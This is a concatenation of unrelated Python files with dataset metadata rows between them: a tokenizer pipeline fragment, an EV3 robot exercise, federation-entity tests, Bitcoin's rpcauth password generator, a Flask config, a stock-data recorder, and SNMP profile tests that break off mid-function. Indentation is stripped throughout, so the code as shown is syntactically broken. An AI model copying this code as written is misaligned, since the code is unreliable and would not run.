# Impossible to guest what is the right tokenizer here
raise Exception(
"Impossible to guess which tokenizer to use. "
"Please provided a PretrainedTokenizer class or a path/identifier to a pretrained tokenizer."
)
# Instantiate tokenizer if needed
if isinstance(ans_tokenizer, (str, tuple)):
if isinstance(ans_tokenizer, tuple):
# For tuple we have (tokenizer name, {kwargs})
ans_tokenizer = AutoTokenizer.from_pretrained(
ans_tokenizer[0], **ans_tokenizer[1])
else:
ans_tokenizer = AutoTokenizer.from_pretrained(
ans_tokenizer)
if isinstance(ans_model, str):
ans_model = AutoModelForSeq2SeqLM.from_pretrained(ans_model)
if task == "e2e-qg":
return task_class(model=model, tokenizer=tokenizer, use_cuda=use_cuda)
elif task == "question-generation":
return task_class(model=model, tokenizer=tokenizer, ans_model=ans_model, ans_tokenizer=ans_tokenizer, qg_format=qg_format, use_cuda=use_cuda)
else:
return task_class(model=model, tokenizer=tokenizer, ans_model=model, ans_tokenizer=tokenizer, qg_format=qg_format, use_cuda=use_cuda)
| 34.224138
| 179
| 0.59158
|
debae7eecb3a915e6d20c4737934f796dd5c57b7
| 1,794
|
py
|
Python
|
src/m1_motion.py
|
boewebe/06-IntroductionToRobots
|
85df9a4caccd4246e3674753a81fe0ae687090d3
|
[
"MIT"
] | null | null | null |
src/m1_motion.py
|
boewebe/06-IntroductionToRobots
|
85df9a4caccd4246e3674753a81fe0ae687090d3
|
[
"MIT"
] | null | null | null |
src/m1_motion.py
|
boewebe/06-IntroductionToRobots
|
85df9a4caccd4246e3674753a81fe0ae687090d3
|
[
"MIT"
] | null | null | null |
"""
An opportunity to explore how to make an EV3 Robot move.
Authors: Dave Fisher, David Mutchler, Vibha Alangar,
their colleagues, and Brendan Boewe.
""" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
# -----------------------------------------------------------------------------
# TODO: 2.
# Follow along with the lecture to run this program:
# - Using SSH from your computer
# When you have successfully run this program, change this _TODO_ to DONE.
# -----------------------------------------------------------------------------
import simple_rosebotics as rb
import time
def main():
""" Calls the other functions to test/demo them. """
go_two_seconds()
def go_two_seconds():
# -------------------------------------------------------------------------
# TODO: 3.
# Make the robot move, by using this pattern:
# - Turn on (start) the wheel motors.
# - time.sleep(2) # Pause here, let other processes run for 2 seconds
# - Turn off (brake or coast) the wheel motors.
#
# Use the DOT trick to figure out how to start, brake and coast motors.
# -------------------------------------------------------------------------
left_motor = rb.LargeMotor(rb.Plug("B")) # Constructs Motor for left wheel
left_motor.start()
time.sleep(2)
left_motor.brake()
def run_test_go_inches():
""" Tests the go_inches function. """
# TODO: 4. Implement this function with at least 3 calls to go_inches
# with various inches and speeds.
def go_inches(inches, percent_of_max_speed):
"""
Makes the EV3 Robot move the given number of inches at the given speed.
:type inches: float
:type percent_of_max_speed: float -100 to 100
"""
# TODO: 5. Implement and test this function.
main()
| 32.035714
| 79
| 0.554069
|
7e0647d92db805932df3616a04c69ccd7d1c34eb
| 6,761
|
py
|
Python
|
tests/test_07_oob_entity.py
|
sklemer1/fedoidcmsg
|
b5e48de7a2e55c93915df1b274770134e77888c8
|
[
"Apache-2.0"
] | 1
|
2018-05-09T20:47:06.000Z
|
2018-05-09T20:47:06.000Z
|
tests/test_07_oob_entity.py
|
sklemer1/fedoidcmsg
|
b5e48de7a2e55c93915df1b274770134e77888c8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_07_oob_entity.py
|
sklemer1/fedoidcmsg
|
b5e48de7a2e55c93915df1b274770134e77888c8
|
[
"Apache-2.0"
] | 1
|
2018-10-04T13:55:58.000Z
|
2018-10-04T13:55:58.000Z
|
import os
from urllib.parse import quote_plus
from oidcmsg.key_jar import KeyJar
from oidcmsg.key_jar import build_keyjar
from oidcmsg.key_jar import public_keys_keyjar
from oidcmsg.oauth2 import Message
from fedoidcmsg import MetadataStatement
from fedoidcmsg.bundle import JWKSBundle
from fedoidcmsg.entity import FederationEntity
from fedoidcmsg.entity import FederationEntityOOB
from fedoidcmsg.entity import make_federation_entity
from fedoidcmsg.operator import Operator
from fedoidcmsg.signing_service import InternalSigningService
from fedoidcmsg.test_utils import make_signing_sequence, create_federation_entities
KEYDEFS = [
{"type": "RSA", "key": '', "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]}
]
def public_jwks_bundle(jwks_bundle):
jb_copy = JWKSBundle('')
for fo, kj in jwks_bundle.bundle.items():
kj_copy = KeyJar()
for owner in kj.owners():
public_keys_keyjar(kj, owner, kj_copy, owner)
jb_copy.bundle[fo] = kj_copy
return jb_copy
def test_get_metadata_statement():
jb = JWKSBundle('')
for iss in ['https://example.org/', 'https://example.com/']:
jb[iss] = build_keyjar(KEYDEFS)[1]
self_signer = InternalSigningService(keyjar=jb['https://example.com/'],
iss='https://example.com/')
op = Operator(self_signer=self_signer, iss='https://example.com/')
req = MetadataStatement(foo='bar')
sms = op.pack_metadata_statement(req, sign_alg='RS256')
sms_dir = {'https://example.com': sms}
req['metadata_statements'] = Message(**sms_dir)
ent = FederationEntity(None, fo_bundle=public_jwks_bundle(jb))
loe = ent.get_metadata_statement(req)
assert loe
def test_add_sms_spec_to_request():
jb = JWKSBundle('')
for iss in ['https://example.org/', 'https://example.com/']:
jb[iss] = build_keyjar(KEYDEFS)[1]
kj = build_keyjar(KEYDEFS)[1]
sign_serv = InternalSigningService('https://signer.example.com',
keyjar=kj)
ent = FederationEntityOOB(None, self_signer=sign_serv,
fo_bundle=public_jwks_bundle(jb),
context='response')
ent.metadata_statements = {
'response': {
'https://example.org/': 'https://example.org/sms1'
}
}
req = MetadataStatement(foo='bar')
ent.add_sms_spec_to_request(req, ['https://example.org/'])
assert 'metadata_statement_uris' in req
def test_add_signing_keys():
kj = build_keyjar(KEYDEFS)[1]
sign_serv = InternalSigningService('https://signer.example.com',
keyjar=kj)
ent = FederationEntityOOB(None, self_signer=sign_serv)
req = MetadataStatement(foo='bar')
ent.add_signing_keys(req)
assert 'signing_keys' in req
_path = os.path.realpath(__file__)
root_dir, _fname = os.path.split(_path)
def test_make_federation_entity():
config = {
'self_signer': {
'private_path': '{}/private_jwks'.format(root_dir),
'key_defs': KEYDEFS,
'public_path': '{}/public_jwks'.format(root_dir)
},
'sms_dir': '{}/ms/https%3A%2F%2Fsunet.se'.format(root_dir),
'fo_bundle': {
'private_path': '{}/fo_bundle_signing_keys'.format(root_dir),
'key_defs': KEYDEFS,
'public_path': '{}/pub_fo_bundle_signing_keys'.format(root_dir),
'dir': '{}/fo_jwks'.format(root_dir)
}
}
fe = make_federation_entity(config, 'https://op.example.com')
assert fe
assert isinstance(fe, FederationEntityOOB)
assert isinstance(fe.jwks_bundle, JWKSBundle)
assert fe.iss == 'https://op.example.com'
def test_sequence():
config = {
'self_signer': {
'private_path': '{}/private_jwks'.format(root_dir),
'key_defs': KEYDEFS,
'public_path': '{}/public_jwks'.format(root_dir)
},
'sms_dir': '{}/ms/https%3A%2F%2Fsunet.se'.format(root_dir),
'fo_bundle': {
'private_path': '{}/fo_bundle_signing_keys'.format(root_dir),
'key_defs': KEYDEFS,
'public_path': '{}/pub_fo_bundle_signing_keys'.format(root_dir),
'dir': '{}/fo_jwks'.format(root_dir)
},
'context': 'discovery'
}
fe = make_federation_entity(config, 'https://op.example.com')
req = MetadataStatement(foo='bar')
fe.add_sms_spec_to_request(req)
fe.add_signing_keys(req)
updated_req = fe.self_sign(req, 'https://example.com')
assert updated_req
assert set(updated_req.keys()) == {'foo', 'signing_keys',
'metadata_statements'}
ENTITY = create_federation_entities(['https://op.sunet.se', 'https://sunet.se',
'https://swamid.sunet.se'], KEYDEFS,
root_dir=root_dir)
def test_update_metadata_statement():
make_signing_sequence(['https://op.sunet.se', 'https://sunet.se',
'https://swamid.sunet.se'], ENTITY)
op = ENTITY['https://op.sunet.se']
metadata_statement = MetadataStatement(foo='bar')
metadata_statement = op.update_metadata_statement(metadata_statement)
assert metadata_statement
assert set(metadata_statement.keys()) == {'foo', 'metadata_statements'}
swamid = ENTITY['https://swamid.sunet.se']
# on the RP side
rp = FederationEntityOOB(None, 'https://rp.sunet.se')
# Need the FO bundle, which in this case only needs Swamid's key
jb = JWKSBundle('https://rp.sunet.se')
_kj = KeyJar()
_kj.import_jwks(swamid.self_signer.public_keys(), swamid.iss)
jb['https://swamid.sunet.se'] = _kj
rp.jwks_bundle = jb
l = rp.get_metadata_statement(metadata_statement, MetadataStatement,
'discovery')
assert l[0].iss == 'https://op.sunet.se'
assert l[0].fo == 'https://swamid.sunet.se'
assert l[0].le == {'foo':'bar'}
def test_updating_metadata_no_superior():
op = ENTITY['https://op.sunet.se']
op.metadata_statements['discovery'] = {}
metadata_statement = MetadataStatement(foo='bar')
metadata_statement = op.update_metadata_statement(metadata_statement)
assert metadata_statement
assert set(metadata_statement.keys()) == {'foo', 'metadata_statements'}
# swamid = ENTITY['https://swamid.sunet.se']
# on the RP side
rp = FederationEntityOOB(None, 'https://rp.sunet.se')
l = rp.get_metadata_statement(metadata_statement, MetadataStatement,
'discovery')
assert l[0].iss == 'https://op.sunet.se'
assert l[0].fo == 'https://op.sunet.se'
assert l[0].le == {'foo':'bar'}
| 35.213542
| 83
| 0.633782
|
4d4db935980cef08c9a01f37d8841233ce019348
| 1,113
|
py
|
Python
|
share/rpcuser/rpcuser.py
|
VadiqueMe/dogecoin
|
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
|
[
"MIT"
] | 1
|
2021-01-03T13:55:19.000Z
|
2021-01-03T13:55:19.000Z
|
share/rpcuser/rpcuser.py
|
VadiqueMe/dogecoin
|
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
|
[
"MIT"
] | 2
|
2020-01-01T05:27:26.000Z
|
2021-01-06T08:04:47.000Z
|
share/rpcuser/rpcuser.py
|
VadiqueMe/dogecoin
|
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
|
[
"MIT"
] | 1
|
2021-01-03T13:39:37.000Z
|
2021-01-03T13:39:37.000Z
|
#!/usr/bin/env python2
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php
import hashlib
import sys
import os
from random import SystemRandom
import base64
import hmac
if len(sys.argv) < 2:
sys.stderr.write('Please include username as an argument.\n')
sys.exit(0)
username = sys.argv[1]
#This uses os.urandom() underneath
cryptogen = SystemRandom()
#Create 16 byte hex salt
salt_sequence = [cryptogen.randrange(256) for i in range(16)]
hexseq = list(map(hex, salt_sequence))
salt = "".join([x[2:] for x in hexseq])
#Create 32 byte b64 password
password = base64.urlsafe_b64encode(os.urandom(32))
digestmod = hashlib.sha256
if sys.version_info.major >= 3:
password = password.decode('utf-8')
digestmod = 'SHA256'
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod)
result = m.hexdigest()
print("String to be appended to bitcoin.conf:")
print("rpcauth="+username+":"+salt+"$"+result)
print("Your password:\n"+password)
| 26.5
| 79
| 0.728661
|
85e15bb11c30c485cadae7a08d9507c19011677c
| 632
|
py
|
Python
|
config.py
|
jamietsadler/itx_nabla
|
c9696c75f9ca02796b9c89e4656013722f15b075
|
[
"MIT"
] | null | null | null |
config.py
|
jamietsadler/itx_nabla
|
c9696c75f9ca02796b9c89e4656013722f15b075
|
[
"MIT"
] | 60
|
2021-09-13T07:19:50.000Z
|
2022-03-29T07:18:18.000Z
|
config.py
|
jamietsadler/itx_nabla
|
c9696c75f9ca02796b9c89e4656013722f15b075
|
[
"MIT"
] | null | null | null |
"""Flask configuration."""
from os import environ, path
from dotenv import load_dotenv
basedir = path.abspath(path.dirname(__file__))
load_dotenv(path.join(basedir, '.env'))
class Config:
"""Set Flask config variables."""
FLASK_ENV = 'development'
TESTING = True
SECRET_KEY = environ.get('SECRET_KEY')
STATIC_FOLDER = 'static'
TEMPLATES_FOLDER = 'templates'
# Database
SQLALCHEMY_DATABASE_URI = environ.get('SQLALCHEMY_DATABASE_URI')
SQLALCHEMY_TRACK_MODIFICATIONS = False
# # AWS Secrets
# AWS_SECRET_KEY = environ.get('AWS_SECRET_KEY')
# AWS_KEY_ID = environ.get('AWS_KEY_ID')
| 26.333333
| 68
| 0.712025
|
5afee75a91dc41f48230b292ccc4813ddf9fab99
| 2,077
|
py
|
Python
|
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 1
|
2020-04-06T04:17:53.000Z
|
2020-04-06T04:17:53.000Z
|
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 2
|
2019-12-20T13:12:30.000Z
|
2020-01-03T06:24:30.000Z
|
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from zvdata.utils.pd_utils import pd_is_not_null
from zvdata.utils.time_utils import now_pd_timestamp
from zvdata.utils.utils import to_float
from zvt.api.api import get_dividend_financing, get_spo_detail
from zvt.domain import SpoDetail, DividendFinancing
from zvt.recorders.eastmoney.common import EastmoneyPageabeDataRecorder
class SPODetailRecorder(EastmoneyPageabeDataRecorder):
data_schema = SpoDetail
url = 'https://emh5.eastmoney.com/api/FenHongRongZi/GetZengFaMingXiList'
page_url = url
path_fields = ['ZengFaMingXiList']
def get_original_time_field(self):
return 'ZengFaShiJian'
def get_data_map(self):
return {
"spo_issues": ("ShiJiZengFa", to_float),
"spo_price": ("ZengFaJiaGe", to_float),
"spo_raising_fund": ("ShiJiMuJi", to_float)
}
def on_finish(self):
last_year = str(now_pd_timestamp().year)
codes = [item.code for item in self.entities]
need_filleds = get_dividend_financing(provider=self.provider, codes=codes,
return_type='domain',
session=self.session,
filters=[DividendFinancing.spo_raising_fund.is_(None)],
end_timestamp=last_year)
for item in need_filleds:
df = get_spo_detail(provider=self.provider, entity_id=item.entity_id,
columns=[SpoDetail.timestamp, SpoDetail.spo_raising_fund],
start_timestamp=item.timestamp,
end_timestamp="{}-12-31".format(item.timestamp.year))
if pd_is_not_null(df):
item.spo_raising_fund = df['spo_raising_fund'].sum()
self.session.commit()
super().on_finish()
__all__ = ['SPODetailRecorder']
if __name__ == '__main__':
# init_log('spo_detail.log')
recorder = SPODetailRecorder(codes=['000999'])
recorder.run()
| 38.462963
| 101
| 0.614829
|
04f3516c6d09788a13ae0fe4217bfa02721bc48b
| 82,178
|
py
|
Python
|
snmp/tests/test_profiles.py
|
szibis/integrations-core
|
e8eb6484a7aea40f5919929e02608cbe4babaacf
|
[
"BSD-3-Clause"
] | null | null | null |
snmp/tests/test_profiles.py
|
szibis/integrations-core
|
e8eb6484a7aea40f5919929e02608cbe4babaacf
|
[
"BSD-3-Clause"
] | null | null | null |
snmp/tests/test_profiles.py
|
szibis/integrations-core
|
e8eb6484a7aea40f5919929e02608cbe4babaacf
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import logging
import pytest
from datadog_checks.base import ConfigurationError
from datadog_checks.dev.utils import get_metadata_metrics
from datadog_checks.snmp import SnmpCheck
from datadog_checks.snmp.utils import get_profile_definition, recursively_expand_base_profiles
from . import common
from .metrics import (
ADAPTER_IF_COUNTS,
CCCA_ROUTER_GAUGES,
CIE_METRICS,
CPU_METRICS,
DISK_GAUGES,
DRS_GAUGES,
FRU_METRICS,
IF_COUNTS,
IF_GAUGES,
IF_RATES,
IP_COUNTS,
IP_IF_COUNTS,
IPX_COUNTS,
LTM_GAUGES,
LTM_NODES_COUNTS,
LTM_NODES_GAUGES,
LTM_NODES_RATES,
LTM_POOL_COUNTS,
LTM_POOL_GAUGES,
LTM_POOL_MEMBER_COUNTS,
LTM_POOL_MEMBER_GAUGES,
LTM_POOL_MEMBER_RATES,
LTM_POOL_RATES,
LTM_VIRTUAL_SERVER_COUNTS,
LTM_VIRTUAL_SERVER_GAUGES,
LTM_VIRTUAL_SERVER_RATES,
MEMORY_METRICS,
PEER_GAUGES,
PEER_RATES,
PROBE_GAUGES,
SYSTEM_STATUS_GAUGES,
TCP_COUNTS,
TCP_GAUGES,
UDP_COUNTS,
VOLTAGE_GAUGES,
)
pytestmark = common.python_autodiscovery_only
def test_load_profiles(caplog):
instance = common.generate_instance_config([])
check = SnmpCheck('snmp', {}, [instance])
caplog.at_level(logging.WARNING)
for name, profile in check.profiles.items():
try:
check._config.refresh_with_profile(profile)
except ConfigurationError as e:
pytest.fail("Profile `{}` is not configured correctly: {}".format(name, e))
assert "table doesn't have a 'metric_tags' section" not in caplog.text
caplog.clear()
def run_profile_check(recording_name):
"""
Run a single check with the provided `recording_name` used as
`community_string` by the docker SNMP endpoint.
"""
instance = common.generate_instance_config([])
instance['community_string'] = recording_name
instance['enforce_mib_constraints'] = False
check = SnmpCheck('snmp', {}, [instance])
check.check(instance)
@pytest.mark.unit
@pytest.mark.parametrize(
'definition_file, equivalent_definition',
[
pytest.param('_base_cisco.yaml', {'extends': ['_base.yaml', '_cisco-generic.yaml']}, id='generic'),
pytest.param(
'_base_cisco_voice.yaml',
{'extends': ['_base.yaml', '_cisco-generic.yaml', '_cisco-voice.yaml']},
id='voice',
),
],
)
def test_compat_cisco_base_profiles(definition_file, equivalent_definition):
# type: (str, dict) -> None
"""
Cisco and Cisco Voice base profiles were replaced by mixins (see Pull #6792).
But their definition files should still be present and contain equivalent metrics to ensure backward compatibility.
"""
definition = get_profile_definition({'definition_file': definition_file})
recursively_expand_base_profiles(definition)
recursively_expand_base_profiles(equivalent_definition)
assert definition == equivalent_definition
@pytest.mark.usefixtures("dd_environment")
def test_cisco_voice(aggregator):
run_profile_check('cisco_icm')
tags = ['snmp_profile:cisco_icm', 'snmp_host:test'] + common.CHECK_TAGS
resources = ["hrSWRunPerfMem", "hrSWRunPerfCPU"]
common.assert_common_metrics(aggregator, tags)
for resource in resources:
aggregator.assert_metric('snmp.{}'.format(resource), metric_type=aggregator.GAUGE, tags=tags)
run_indices = [4, 7, 8, 9, 10, 18, 24, 29, 30]
for index in run_indices:
status_tags = tags + ['run_index:{}'.format(index)]
aggregator.assert_metric('snmp.hrSWRunStatus', metric_type=aggregator.GAUGE, tags=status_tags)
cvp_gauges = [
"ccvpSipIntAvgLatency1",
"ccvpSipIntAvgLatency2",
"ccvpSipIntConnectsRcv",
"ccvpSipIntNewCalls",
"ccvpSipRtActiveCalls",
"ccvpSipRtTotalCallLegs",
"ccvpLicRtPortsInUse",
"ccvpLicAggMaxPortsInUse",
]
for cvp in cvp_gauges:
aggregator.assert_metric('snmp.{}'.format(cvp), metric_type=aggregator.GAUGE, tags=tags)
ccms_counts = ["ccmRejectedPhones", "ccmUnregisteredPhones"]
ccms_gauges = ["ccmRegisteredGateways", "ccmRegisteredPhones"]
for ccm in ccms_counts:
aggregator.assert_metric('snmp.{}'.format(ccm), metric_type=aggregator.RATE, tags=tags)
for ccm in ccms_gauges:
aggregator.assert_metric('snmp.{}'.format(ccm), metric_type=aggregator.GAUGE, tags=tags)
calls = [
"cvCallVolPeerIncomingCalls",
"cvCallVolPeerOutgoingCalls",
]
peers = [4, 13, 14, 17, 18, 22, 25, 30, 31]
for call in calls:
for peer in peers:
peer_tags = tags + ["peer_index:{}".format(peer)]
aggregator.assert_metric('snmp.{}'.format(call), metric_type=aggregator.GAUGE, tags=peer_tags)
calls = [
"cvCallVolMediaIncomingCalls",
"cvCallVolMediaOutgoingCalls",
]
for call in calls:
aggregator.assert_metric('snmp.{}'.format(call), metric_type=aggregator.GAUGE, tags=tags)
dial_controls = [
"dialCtlPeerStatsAcceptCalls",
"dialCtlPeerStatsFailCalls",
"dialCtlPeerStatsRefuseCalls",
"dialCtlPeerStatsSuccessCalls",
]
for ctl in dial_controls:
aggregator.assert_metric(
'snmp.{}'.format(ctl), metric_type=aggregator.MONOTONIC_COUNT, tags=["peer_index:7"] + tags
)
pim_tags = tags + ['pim_host:test', 'pim_name:name', 'pim_num:2']
aggregator.assert_metric('snmp.{}'.format("cccaPimStatus"), metric_type=aggregator.GAUGE, tags=pim_tags)
aggregator.assert_metric('snmp.{}'.format("sysUpTimeInstance"), metric_type=aggregator.GAUGE, tags=tags, count=1)
instance_numbers = ['4446', '5179', '12093', '19363', '25033', '37738', '42562', '51845', '62906', '63361']
for metric in CCCA_ROUTER_GAUGES:
for instance_number in instance_numbers:
instance_tags = tags + ['instance_number:{}'.format(instance_number)]
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=instance_tags)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_f5(aggregator):
run_profile_check('f5')
gauges = [
'sysStatMemoryTotal',
'sysStatMemoryUsed',
'sysGlobalTmmStatMemoryTotal',
'sysGlobalTmmStatMemoryUsed',
'sysGlobalHostOtherMemoryTotal',
'sysGlobalHostOtherMemoryUsed',
'sysGlobalHostSwapTotal',
'sysGlobalHostSwapUsed',
'sysTcpStatOpen',
'sysTcpStatCloseWait',
'sysTcpStatFinWait',
'sysTcpStatTimeWait',
'sysUdpStatOpen',
'sysClientsslStatCurConns',
]
counts = [
'sysTcpStatAccepts',
'sysTcpStatAcceptfails',
'sysTcpStatConnects',
'sysTcpStatConnfails',
'sysUdpStatAccepts',
'sysUdpStatAcceptfails',
'sysUdpStatConnects',
'sysUdpStatConnfails',
'sysClientsslStatEncryptedBytesIn',
'sysClientsslStatEncryptedBytesOut',
'sysClientsslStatDecryptedBytesIn',
'sysClientsslStatDecryptedBytesOut',
'sysClientsslStatHandshakeFailures',
]
cpu_rates = [
'sysMultiHostCpuUser',
'sysMultiHostCpuNice',
'sysMultiHostCpuSystem',
'sysMultiHostCpuIdle',
'sysMultiHostCpuIrq',
'sysMultiHostCpuSoftirq',
'sysMultiHostCpuIowait',
]
interfaces = ['1.0', 'mgmt', '/Common/internal', '/Common/http-tunnel', '/Common/socks-tunnel']
tags = ['snmp_profile:f5-big-ip', 'snmp_host:f5-big-ip-adc-good-byol-1-vm.c.datadog-integrations-lab.internal']
tags += common.CHECK_TAGS
common.assert_common_metrics(aggregator, tags)
for metric in gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in counts:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1)
for metric in cpu_rates:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=['cpu:0'] + tags, count=1)
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=['cpu:1'] + tags, count=1)
for interface in interfaces:
interface_tags = ['interface:{}'.format(interface)] + tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=interface_tags, count=1,
)
for metric in IF_RATES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=interface_tags, count=1
)
for metric in IF_GAUGES:
for interface in interfaces:
aggregator.assert_metric(
'snmp.{}'.format(metric),
metric_type=aggregator.GAUGE,
tags=['interface:{}'.format(interface)] + tags,
count=1,
)
for version in ['ipv4', 'ipv6']:
ip_tags = ['ipversion:{}'.format(version)] + tags
for metric in IP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=ip_tags, count=1
)
for metric in LTM_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
servers = ['server1', 'server2', 'server3']
for server in servers:
server_tags = tags + ['server:{}'.format(server)]
for metric in LTM_VIRTUAL_SERVER_GAUGES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=server_tags, count=1,
)
for metric in LTM_VIRTUAL_SERVER_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=server_tags, count=1,
)
for metric in LTM_VIRTUAL_SERVER_RATES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=server_tags, count=1,
)
nodes = ['node1', 'node2', 'node3']
for node in nodes:
node_tags = tags + ['node:{}'.format(node)]
for metric in LTM_NODES_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=node_tags, count=1)
for metric in LTM_NODES_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=node_tags, count=1
)
for metric in LTM_NODES_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=node_tags, count=1)
pools = ['pool1', 'pool2']
for pool in pools:
pool_tags = tags + ['pool:{}'.format(pool)]
for metric in LTM_POOL_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=pool_tags, count=1)
for metric in LTM_POOL_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=pool_tags, count=1
)
for metric in LTM_POOL_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=pool_tags, count=1)
pool_members = [('pool1', 'node1'), ('pool1', 'node2'), ('pool2', 'node3')]
for pool, node in pool_members:
pool_member_tags = tags + ['pool:{}'.format(pool), 'node:{}'.format(node)]
for metric in LTM_POOL_MEMBER_GAUGES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=pool_member_tags, count=1
)
for metric in LTM_POOL_MEMBER_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=pool_member_tags, count=1
)
for metric in LTM_POOL_MEMBER_RATES:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=pool_member_tags, count=1
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_router(aggregator):
run_profile_check('network')
common_tags = common.CHECK_TAGS + ['snmp_profile:generic-router']
common.assert_common_metrics(aggregator, common_tags)
for interface in ['eth0', 'eth1']:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for version in ['ipv4', 'ipv6']:
tags = ['ipversion:{}'.format(version)] + common_tags
for metric in IP_COUNTS + IPX_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IP_IF_COUNTS:
for interface in ['17', '21']:
tags = ['ipversion:{}'.format(version), 'interface:{}'.format(interface)] + common_tags
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_f5_router(aggregator):
# Use the generic profile against the f5 device
instance = common.generate_instance_config([])
instance['community_string'] = 'f5'
instance['enforce_mib_constraints'] = False
init_config = {'profiles': {'router': {'definition_file': 'generic-router.yaml'}}}
check = SnmpCheck('snmp', init_config, [instance])
check.check(instance)
interfaces = ['1.0', 'mgmt', '/Common/internal', '/Common/http-tunnel', '/Common/socks-tunnel']
common_tags = ['snmp_profile:router', 'snmp_host:f5-big-ip-adc-good-byol-1-vm.c.datadog-integrations-lab.internal']
common_tags.extend(common.CHECK_TAGS)
common.assert_common_metrics(aggregator, common_tags)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for version in ['ipv4', 'ipv6']:
tags = ['ipversion:{}'.format(version)] + common_tags
for metric in IP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_3850(aggregator):
run_profile_check('3850')
# We're not covering all interfaces
interfaces = ["Gi1/0/{}".format(i) for i in range(1, 48)]
common_tags = common.CHECK_TAGS + ['snmp_host:Cat-3850-4th-Floor.companyname.local', 'snmp_profile:cisco-3850']
common.assert_common_metrics(aggregator, common_tags)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
